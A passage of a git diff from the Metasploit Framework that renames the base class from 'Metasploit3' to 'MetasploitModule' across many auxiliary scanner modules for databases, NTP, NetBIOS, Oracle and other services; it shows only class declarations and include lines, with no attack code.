Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb index 9f0c275fd7..8c43197c72 100644 --- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb index 1dd600d8eb..66de20acfc 100644 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ b/modules/auxiliary/scanner/misc/redis_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Module::Deprecated deprecated(Date.new(2016, 3, 5), 'auxiliary/scanner/redis/redis_server') diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index e77aaa2c1e..b364568cd3 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index d52870235d..8b9ecfc9cb 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 04900cde94..9e75d30953 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb index 3fbd8b36c1..25bf30368e 100644 --- a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index e8091b4b1b..5240dc8767 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 525441c1c4..711fe24d98 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/msf/msf_rpc_login.rb b/modules/auxiliary/scanner/msf/msf_rpc_login.rb index 1f3100ec96..a6288c472b 100644 --- a/modules/auxiliary/scanner/msf/msf_rpc_login.rb +++ b/modules/auxiliary/scanner/msf/msf_rpc_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index 28cacb64af..485c406829 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb +++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 5180dc687f..4accba34bd 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 6c07f9f3b8..96ff2394cb 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mssql' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index 12078e523a..a15b4936ba 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 628a8fdb86..63b2249296 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index bcb1234c20..03ae86a4bb 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index f5b6bdbe5c..651777c43e 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index ce7c378756..001db59de4 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 97658016c6..96df43e074 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mysql' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index ede601b57e..18553d0c99 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index bde7d5c2b7..39d28e1a01 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index 5c21a67f68..c549f03e37 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index ba12f61143..c9e8f5bb7b 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 88aef9dc9b..2d233bed14 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/nessus' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb index e687f70ddf..295fe10f58 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb index 412c93108b..aab6e9f514 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index 64b9befe91..fa88313e53 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index fe990c8685..d1d9130fda 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb index 0953d09cec..85d3d81a91 100644 --- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb +++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index fd2aee0706..aebc979928 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index ba17c40926..87d086e4c0 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb index 104e73a527..3c9fd1e670 100644 --- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb +++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index c2d7653db8..ed78121c35 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 900c9b7fad..47e78484c0 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 98cb2a0d4c..1da9bb99e7 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index f31ee5f258..1e32c29acd 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index eb4ebbc44a..f83e1350f8 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 9913e40b1c..3e94f7c34e 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index 0d0e0d3916..d4cc0f4256 100644 --- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index c778ba15ca..15c51b99d2 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index fbf870fb2d..e215288450 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index f72286bd28..87737d307d 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index fa717b7ec0..d96b46579d 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index e3ba450180..9c936d3938 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index c3a0442d33..e06bac1f7b 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index b733440c72..19935590ea 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Nmap diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index a61284d5fd..a670e1eb02 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 7b24a42b36..d953f819a9 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 3b740f7643..389baf3385 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 3bd78c1437..4450a690bb 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index aab795941c..30e5c76522 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index c07928617e..fae6c4f40c 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 8fe5687b47..4e7ff072d0 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index d787bf7863..b442daa78d 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index ab83d9191d..348bf2354c 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 693c294945..e70063ed56 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index 98ae8f9257..b869bea541 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/pop3' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index ff3d1828c2..f2d1d45f4f 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index abc7f8ca76..b3e4fd2d44 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index e020120a0e..d6b5df3200 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index d84256ff30..ddd058497e 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Order is important here include Msf::Auxiliary::Report diff --git 